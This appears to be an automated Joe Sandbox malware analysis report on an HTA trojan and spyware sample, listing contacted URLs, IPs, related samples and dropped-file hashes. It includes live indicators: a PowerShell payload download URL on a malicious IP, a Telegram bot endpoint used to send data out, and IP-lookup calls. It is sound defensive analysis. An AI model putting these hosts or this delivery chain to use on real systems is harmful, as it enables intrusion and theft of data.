                              NameSourceMaliciousAntivirus DetectionReputation
                              http://nuget.org/NuGet.exepowershell.exe, 00000003.00000002.982169295.00000000060BA000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                https://aka.ms/winsvr-2022-pshelppowershell.exe, 00000003.00000002.975652053.00000000051A7000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000003.00000002.975652053.00000000051A7000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000003.00000002.975652053.00000000051A7000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      http://crl.microsoftpowershell.exe, 00000003.00000002.983759813.000000000795D000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		high
                                        http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000003.00000002.975652053.00000000051A7000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://reallyfreegeoip.orgdRegSvcs.exe, 00000007.00000002.2094400694.000000000254D000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://contoso.com/Licensepowershell.exe, 00000003.00000002.982169295.00000000060BA000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://contoso.com/Iconpowershell.exe, 00000003.00000002.982169295.00000000060BA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://crl.ver)svchost.exe, 00000009.00000002.2095135313.0000024D65A10000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://checkip.dyndns.orgRegSvcs.exe, 00000007.00000002.2094400694.0000000002530000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2094400694.000000000251E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://github.com/Pester/Pesterpowershell.exe, 00000003.00000002.975652053.00000000051A7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://reallyfreegeoip.org/xml/8.46.123.189lRegSvcs.exe, 00000007.00000002.2094400694.0000000002530000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://g.live.com/odclientsettings/Prod-C:qmgr.db.9.drfalse
                                                          		high
                                                          http://checkip.dyndns.comdRegSvcs.exe, 00000007.00000002.2094400694.0000000002530000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://aka.ms/pscore6lBGrpowershell.exe, 00000003.00000002.975652053.0000000005051000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://checkip.dyndns.org/qcosse.exe, 00000006.00000002.969302157.00000000033B0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2090511235.0000000000402000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                		high
                                                                http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000003.00000002.975652053.00000000051A7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://contoso.com/powershell.exe, 00000003.00000002.982169295.00000000060BA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://g.live.com/odclientsettings/ProdV2-C:svchost.exe, 00000009.00000003.1203401116.0000024D65810000.00000004.00000800.00020000.00000000.sdmp, edb.log.9.drfalse
                                                                      		high
                                                                      https://nuget.org/nuget.exepowershell.exe, 00000003.00000002.982169295.00000000060BA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://reallyfreegeoip.org/xml/8.46.123.189dRegSvcs.exe, 00000007.00000002.2094400694.0000000002530000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          http://reallyfreegeoip.orgRegSvcs.exe, 00000007.00000002.2094400694.000000000254D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            http://checkip.dyndns.orgdRegSvcs.exe, 00000007.00000002.2094400694.0000000002530000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://reallyfreegeoip.orgRegSvcs.exe, 00000007.00000002.2094400694.0000000002530000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                http://107.174.231.211/311/cssos.exevpowershell.exe, 00000003.00000002.983878644.000000000798A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                		unknown
                                                                                http://107.174.231.211/311/cssospowershell.exe, 00000003.00000002.975652053.000000000547A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                		unknown
                                                                                http://checkip.dyndns.comRegSvcs.exe, 00000007.00000002.2094400694.0000000002530000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  http://checkip.dyndns.org/dRegSvcs.exe, 00000007.00000002.2094400694.0000000002530000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000003.00000002.975652053.0000000005051000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2094400694.00000000024B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      http://107.174.231.211/311/cssos.exenpowershell.exe, 00000003.00000002.983878644.000000000798A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      		unknown
                                                                                      https://api.telegram.org/bot-/sendDocument?chat_id=cosse.exe, 00000006.00000002.969302157.00000000033B0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2090511235.0000000000402000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://reallyfreegeoip.org/xml/cosse.exe, 00000006.00000002.969302157.00000000033B0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2094400694.0000000002530000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2090511235.0000000000402000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                          		high

                                                                                          World Map of Contacted IPs

                                                                                          • No. of IPs < 25%
                                                                                          • 25% < No. of IPs < 50%
                                                                                          • 50% < No. of IPs < 75%
                                                                                          • 75% < No. of IPs

                                                                                          Public IPs

                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                          107.174.231.211
                                                                                          		unknownUnited States
                                                                                          		36352AS-COLOCROSSINGUStrue
                                                                                          104.21.64.1
                                                                                          		reallyfreegeoip.orgUnited States
                                                                                          		13335CLOUDFLARENETUSfalse
                                                                                          132.226.247.73
                                                                                          		checkip.dyndns.comUnited States
                                                                                          		16989UTMEMUSfalse

                                                                                          Private

                                                                                          IP
                                                                                          127.0.0.1

                                                                                          General Information

                                                                                          Joe Sandbox version:42.0.0 Malachite
                                                                                          Analysis ID:1636644
                                                                                          Start date and time:2025-03-13 01:17:56 +01:00
                                                                                          Joe Sandbox product:CloudBasic
                                                                                          Overall analysis duration:0h 7m 3s
                                                                                          Hypervisor based Inspection enabled:false
                                                                                          Report type:full
                                                                                          Cookbook file name:default.jbs
                                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                          Number of analysed new started processes analysed:18
                                                                                          Number of new started drivers analysed:0
                                                                                          Number of existing processes analysed:0
                                                                                          Number of existing drivers analysed:0
                                                                                          Number of injected processes analysed:0
                                                                                          Technologies:
                                                                                          • HCA enabled
                                                                                          • EGA enabled
                                                                                          • AMSI enabled
                                                                                          Analysis Mode:default
                                                                                          Analysis stop reason:Timeout
                                                                                          Sample name:wecreatebestthingsentirelifeforgivenyou.hta
                                                                                          Detection:MAL
                                                                                          Classification:mal100.troj.spyw.expl.evad.winHTA@15/19@2/4
                                                                                          EGA Information:
                                                                                          • Successful, ratio: 100%
                                                                                          HCA Information:
                                                                                          • Successful, ratio: 99%
                                                                                          • Number of executed functions: 67
                                                                                          • Number of non-executed functions: 268
                                                                                          Cookbook Comments:
                                                                                          • Found application associated with file extension: .hta

                                                                                          Warnings

                                                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, sppsvc.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                                          • Excluded IPs from analysis (whitelisted): 2.16.185.191, 4.175.87.197, 52.149.20.212
                                                                                          • Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, e16604.dscf.akamaiedge.net, c.pki.goog, fe3cr.delivery.mp.microsoft.com
                                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                          • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                          • Report size getting too big, too many NtCreateKey calls found.
                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                          • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                          • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                          • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                          Simulations

                                                                                          Behavior and APIs

                                                                                          TimeTypeDescription
                                                                                          20:18:55API Interceptor45x Sleep call for process: powershell.exe modified
                                                                                          20:19:28API Interceptor2x Sleep call for process: svchost.exe modified

                                                                                          Joe Sandbox View / Context

                                                                                          IPs

                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                          107.174.231.211Document.xlsGet hashmaliciousUnknownBrowse
                                                                                          • 107.174.231.211/xampp/nso/wecreatebestthingsentirelifeforgivenyou.hta
                                                                                          Document.xlsGet hashmaliciousUnknownBrowse
                                                                                          • 107.174.231.211/xampp/nso/wecreatebestthingsentirelifeforgivenyou.hta
                                                                                          104.21.64.1Compliance_Review_Documents_COSCO20250307_pdf.bat.exeGet hashmaliciousLokibotBrowse
                                                                                          • touxzw.ir/sccc/five/fre.php
                                                                                          0xHPSESJcg.exeGet hashmaliciousFormBookBrowse
                                                                                          • www.otogel.pro/oi08/?Ezu=HLGOigk8zC7c6l2lrMh01rQ2OJKxivxPRh38Fqcsh+790en3zOTPiNsvxvX68DUiI9Ju&q6A=GbtXjbKPa
                                                                                          7zKn77RsRX.exeGet hashmaliciousFormBookBrowse
                                                                                          • www.newanthoperso.shop/3nis/
                                                                                          IBbGrGi4A7.exeGet hashmaliciousFormBookBrowse
                                                                                          • www.rbopisalive.cyou/a669/
                                                                                          ysWQ4BqQrF.exeGet hashmaliciousFormBookBrowse
                                                                                          • www.play-vanguard-nirvana.xyz/egs9/?mVfp=MTrLPvVhZLm&K8elV=2m/uVQwqKH2EIWlawszTKzvIepBfVH/HI19qzylF05nDLsWuBLn1pb4DiFDzbC4NqmTLwL8cGw==
                                                                                          TXzf0xX2uq.exeGet hashmaliciousLokibotBrowse
                                                                                          • touxzw.ir/tking3/five/fre.php
                                                                                          begin.exeGet hashmaliciousDarkTortilla, FormBookBrowse
                                                                                          • www.kdrqcyusevx.info/z84n/
                                                                                          Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exeGet hashmaliciousLokibotBrowse
                                                                                          • touxzw.ir/fix/five/fre.php
                                                                                          Payment.exeGet hashmaliciousLokibotBrowse
                                                                                          • touxzw.ir/sccc/five/fre.php
                                                                                          7RryusxiMtHBz80.exeGet hashmaliciousLokibotBrowse
                                                                                          • touxzw.ir/sss2/five/fre.php
                                                                                          132.226.247.73DHL Shipping Details Ref ID 446331798008765975594-pdf.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                          • checkip.dyndns.org/
                                                                                          PENDING PAYMENT FOR March SOA.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                          • checkip.dyndns.org/
                                                                                          1.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          • checkip.dyndns.org/
                                                                                          kissingwithbestexperiencedgirlfriendonhereformenice.htaGet hashmaliciousCobalt Strike, MSIL Logger, MassLogger RATBrowse
                                                                                          • checkip.dyndns.org/
                                                                                          PO202503S.xlsmGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          • checkip.dyndns.org/
                                                                                          QUOTATION_FEBQUOTE312025PDF.scr.exeGet hashmaliciousMSIL LoggerBrowse
                                                                                          • checkip.dyndns.org/
                                                                                          BL-INVOICE DOCUMENTS.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          • checkip.dyndns.org/
                                                                                          fw5476UX6g.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          • checkip.dyndns.org/
                                                                                          TpHHp3vAuM.exeGet hashmaliciousCryptOne, Snake KeyloggerBrowse
                                                                                          • checkip.dyndns.org/
                                                                                          oR7Y7ZxJLU.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                          • checkip.dyndns.org/

                                                                                          Domains

                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                          reallyfreegeoip.orgYeni Sat#U0131nalma Sipari#U015fi.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                          • 104.21.64.1
                                                                                          Payment_Advise.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                          • 104.21.112.1
                                                                                          4500149631.vbeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                          • 104.21.80.1
                                                                                          DHL Shipping Details Ref ID 446331798008765975594-pdf.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                          • 104.21.48.1
                                                                                          QUOTATION_FEBQUOTE312025PDF.scr.exeGet hashmaliciousMSIL LoggerBrowse
                                                                                          • 104.21.16.1
                                                                                          PENDING PAYMENT FOR March SOA.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                          • 104.21.64.1
                                                                                          Yeni Sat#U0131nalma Sipari#U015fi.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                          • 104.21.96.1
                                                                                          MALZEME G_0017 TABANCA SPREY NOZUL.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                          • 104.21.112.1
                                                                                          Way bill & Invoice.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                          • 104.21.96.1
                                                                                          1.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          • 104.21.96.1
                                                                                          checkip.dyndns.comYeni Sat#U0131nalma Sipari#U015fi.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                          • 193.122.6.168
                                                                                          Payment_Advise.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                          • 193.122.130.0
                                                                                          4500149631.vbeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                          • 158.101.44.242
                                                                                          DHL Shipping Details Ref ID 446331798008765975594-pdf.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                          • 132.226.247.73
                                                                                          QUOTATION_FEBQUOTE312025PDF.scr.exeGet hashmaliciousMSIL LoggerBrowse
                                                                                          • 193.122.6.168
                                                                                          PENDING PAYMENT FOR March SOA.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                          • 132.226.247.73
                                                                                          Yeni Sat#U0131nalma Sipari#U015fi.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                          • 193.122.130.0
                                                                                          MALZEME G_0017 TABANCA SPREY NOZUL.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                          • 193.122.130.0
                                                                                          Way bill & Invoice.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                          • 193.122.6.168
                                                                                          1.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          • 132.226.8.169

                                                                                          ASNs

                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                          UTMEMUSDHL Shipping Details Ref ID 446331798008765975594-pdf.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                          • 132.226.247.73
                                                                                          PENDING PAYMENT FOR March SOA.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                          • 132.226.247.73
                                                                                          1.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          • 132.226.247.73
                                                                                          file.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                          • 132.226.8.169
                                                                                          Invoice.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                          • 132.226.8.169
                                                                                          kissingwithbestexperiencedgirlfriendonhereformenice.htaGet hashmaliciousCobalt Strike, MSIL Logger, MassLogger RATBrowse
                                                                                          • 132.226.247.73
                                                                                          PO202503S.xlsmGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          • 132.226.247.73
                                                                                          QUOTATION_FEBQUOTE312025PDF.scr.exeGet hashmaliciousMSIL LoggerBrowse
                                                                                          • 132.226.247.73
                                                                                          EM#U0130R_7880330875661236965345096345789_3479653.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                          • 132.226.8.169
                                                                                          BL-INVOICE DOCUMENTS.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          • 132.226.247.73
                                                                                          AS-COLOCROSSINGUSsigned contract 01.xlsGet hashmaliciousUnknownBrowse
                                                                                          • 198.12.89.24
                                                                                          PAYMENT ADVICE.xlsGet hashmaliciousUnknownBrowse
                                                                                          • 172.245.123.28
                                                                                          Inquiry.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                          • 172.245.123.24
                                                                                          Document.xlsGet hashmaliciousUnknownBrowse
                                                                                          • 107.174.231.211
                                                                                          HAWKE ORDER 12.3.2025.pdf (#U007e135 KB).xlsGet hashmaliciousUnknownBrowse
                                                                                          • 104.168.7.38
                                                                                          signed contract 01.xlsGet hashmaliciousUnknownBrowse
                                                                                          • 198.12.89.24
                                                                                          Inquiry.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                          • 104.168.7.38
                                                                                          PAYMENT ADVICE.xlsGet hashmaliciousUnknownBrowse
                                                                                          • 172.245.123.28
                                                                                          Inquiry.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                          • 172.245.123.24
                                                                                          HAWKE ORDER 12.3.2025.pdf (#U007e135 KB).xlsGet hashmaliciousUnknownBrowse
                                                                                          • 104.168.7.38
                                                                                          CLOUDFLARENETUShttps://westmaidentrue.click/mirage/magestiqueGet hashmaliciousRedLineBrowse
                                                                                          • 1.1.1.1
                                                                                          load.exeGet hashmaliciousUnknownBrowse
                                                                                          • 172.67.141.133
                                                                                          Catch Me If You Can (2002) 1080p.BluRay.x264.Full 744MB.exeGet hashmaliciousUnknownBrowse
                                                                                          • 104.26.13.205
                                                                                          Catch Me If You Can (2002) 1080p.BluRay.x264.Full 744MB.exeGet hashmaliciousUnknownBrowse
                                                                                          • 104.26.12.205
                                                                                          Catch Me If You Can (2002) 1080p.BluRay.x264.Full 744MB.exeGet hashmaliciousUnknownBrowse
                                                                                          • 104.26.13.205
                                                                                          https://briefingmeetup.deGet hashmaliciousScreenConnect ToolBrowse
                                                                                          • 104.21.112.1
                                                                                          http://bigdataframes.siteGet hashmaliciousUnknownBrowse
                                                                                          • 1.1.1.1
                                                                                          remittance detail_03.12.2025_RECIPIENT_DOMAIN_NAME}00990__098.htmlGet hashmaliciousUnknownBrowse
                                                                                          • 104.21.17.6
                                                                                          SpaceCheatFort.exeGet hashmaliciousLummaC StealerBrowse
                                                                                          • 188.114.97.3
                                                                                          Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                          • 188.114.97.3

                                                                                          JA3 Fingerprints

                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                          54328bd36c14bd82ddaa0c04b25ed9adYeni Sat#U0131nalma Sipari#U015fi.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                          • 104.21.64.1
                                                                                          Payment_Advise.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                          • 104.21.64.1
                                                                                          4500149631.vbeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                          • 104.21.64.1
                                                                                          DHL Shipping Details Ref ID 446331798008765975594-pdf.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                          • 104.21.64.1
                                                                                          PENDING PAYMENT FOR March SOA.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                          • 104.21.64.1
                                                                                          Yeni Sat#U0131nalma Sipari#U015fi.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                          • 104.21.64.1
                                                                                          MALZEME G_0017 TABANCA SPREY NOZUL.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                          • 104.21.64.1
                                                                                          Way bill & Invoice.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                          • 104.21.64.1
                                                                                          1.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          • 104.21.64.1
                                                                                          file.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                          • 104.21.64.1

                                                                                          Dropped Files

                                                                                          No context

                                                                                          Created / dropped Files

                                                                                          C:\ProgramData\Microsoft\Network\Downloader\edb.log

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\svchost.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):1310720
                                                                                          Entropy (8bit):0.4932016394010319
                                                                                          Encrypted:false
                                                                                          SSDEEP:1536:cJNnm0h6QV70hV40h5RJkS6SNJNJbSMeCXhtvKTeYYJyNtEBRDna33JnbgY1ZtaQ:cJhXC9lHmutpJyiRDeJ/aUKrDgnm+
                                                                                          MD5:A46616BB82A2F2E9BAF1733B51EEED23
                                                                                          SHA1:B7463923B9242C245D30834124B5EBCEC59DEC58
                                                                                          SHA-256:D36BE2FD8AD08E39358368F589A9A56DBB038B98CB28E2C6B71329DBFB47C6C2
                                                                                          SHA-512:01D2670193A7BC4CA1509E0951E7A0C0293215C37B54999FD0DE56D53C3FA79BEE0776D738E526564B8C6CA5EAB868B95CC541C4075A5808FB99B66DE8DE187E
                                                                                          Malicious:false
                                                                                          Reputation:low
                                                                                          Preview:^.;V........@..@-....{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@...................................&.#.\.#.........`h.................h.......0.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................

                                                                                          C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\svchost.exe
                                                                                          File Type:Extensible storage engine DataBase, version 0x620, checksum 0xcdb7fa41, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                          Category:dropped
                                                                                          Size (bytes):1310720
                                                                                          Entropy (8bit):0.7216755901360702
                                                                                          Encrypted:false
                                                                                          SSDEEP:1536:DSB2ESB2SSjlK/Tv5m0hnRJjAVtu8Ykr3g16tV2UPkLk+kcBLZiAcZwytuknSDVd:DazaNvFv8V2UW/DLzN/w4wZi
                                                                                          MD5:D37225274D8084E429622C85285C6C2A
                                                                                          SHA1:7D8DB61A0BF31BECCCCECA374E008E73FBE8D08F
                                                                                          SHA-256:0A8F123A5F111674E285084D2FDA1E853AC6219F9CF699FE824361929CB6EC82
                                                                                          SHA-512:AF7BDC5F6B397CCD1B7B7D71BD3CF0A8327F51010B3D98A6BEC2F9F0538B0D91D6DCD4DBD41804ECD94880159561054C6AA6803D1E0ADAB67607270B98681B40
                                                                                          Malicious:false
                                                                                          Reputation:low
                                                                                          Preview:..A... ...............X\...;...{......................p.D..........{}......}..h.F.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... .......-....{...............................................................................................................................................................................................2...{....................................x......}.7..................5......}...........................#......h.F.....................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\svchost.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):16384
                                                                                          Entropy (8bit):0.0797098682871198
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:GAW8YeOy2sqT/fgsCrZClW/tfR2yGXoll+SHY/Xl+/rQLve:GAdzn2ZLfgs3G3fAS4M
                                                                                          MD5:449BADCBCB2E7F3C2E884209B7DA7669
                                                                                          SHA1:DA6C73ACA2C0EA396F3A11B1745F2E21B5810242
                                                                                          SHA-256:65936688AFCC69CD3F5A44283E3CFA91CE23EEB6DDA224B42E3AAF55D42B9235
                                                                                          SHA-512:44AEA522B714F37889CA55261051F1EDBE47D0806F0156843B59820F9E833199FC371A2FFE16CD15E7BEADC57AD38C05711F9F8672F1C6AD9A3653838E35D6F1
                                                                                          Malicious:false
                                                                                          Preview:.m.......................................;...{.......}.......{}..............{}......{}.vv_Q.....{}...................5......}..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\cssos[1].exe

                                                                                          Download File
                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):967680
                                                                                          Entropy (8bit):6.851122327803846
                                                                                          Encrypted:false
                                                                                          SSDEEP:24576:ou6J33O0c+JY5UZ+XC0kGso6FaiJu9OAuWY:Cu0c++OCvkGs9FaiVoY
                                                                                          MD5:709A4FFEC76D0C7715CB6A69A3610EDE
                                                                                          SHA1:172283B9521E8530D1D35D6EBD3E58B448949A4C
                                                                                          SHA-256:B46C0A570D881198169C6CC53BB5E525E294FBC86E527E214926A9FC44E96981
                                                                                          SHA-512:D5A904612D43160A1639DEAB33DBA60125FAEDF50917CFA1B37784C4AAD05DCAC07F1FB8C14587956F822B8DD263F34905B196A885064C617975200CA6595BE0
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                          • Antivirus: ReversingLabs, Detection: 42%
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}.r}.r}.4,".p}.....s}../..A}../#..}../".G}.{.@.{}.{.P.W}.r}.R....)."}.....s}../..s}.r}T.s}.....s}.Richr}.................PE..L......g.........."..................}............@..........................0............@...@.......@.....................L...|....p...;.......................q...+..............................pH..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc....;...p...<..................@..@.reloc...q.......r...R..............@..B........................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                          Download File
                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):1328
                                                                                          Entropy (8bit):5.404165387650546
                                                                                          Encrypted:false
                                                                                          SSDEEP:24:3KIWSKco4KmBs4RPT6BmFoUebIKomjKcmZ9t7J0gt/NK3R8UHr8Htq:xWSU4y4RQmFoUeWmfmZ9tK8NWR8Wz
                                                                                          MD5:C6307B12429F6E428F84DE264B43D27A
                                                                                          SHA1:BAD6A639B350D74D780078C9826C9198257FA86B
                                                                                          SHA-256:9E98C01FD5D833D51AA87D5F5ADC21E0F3542EF541D5FB7409D0183A8C119A97
                                                                                          SHA-512:9A17138F751824EFDFAABDC94CA35F43A69D9CC2AB0FF8F2AA6B1ECB0D570053D2A110C3925A3D47906678205FA6D0CC8ABBEDAC16CBF0E29DAF89B70399F9DC
                                                                                          Malicious:false
                                                                                          Preview:@...e................................................@..........P................1]...E...........(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                                                                                          C:\Users\user\AppData\Local\Temp\RES9E10.tmp

                                                                                          Download File
                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                          File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Thu Mar 13 01:59:43 2025, 1st section name ".debug$S"
                                                                                          Category:dropped
                                                                                          Size (bytes):1328
                                                                                          Entropy (8bit):3.978505072012408
                                                                                          Encrypted:false
                                                                                          SSDEEP:24:H4e9EujwZ7d4WXBwZH2wKLmfwI+ycuZhNgFGakSDFXPNnqSqd:FjwZ7drBwZ1KLmo1ulIGa35FqSK
                                                                                          MD5:283D99F1881D6D50F698F05A47F71BA2
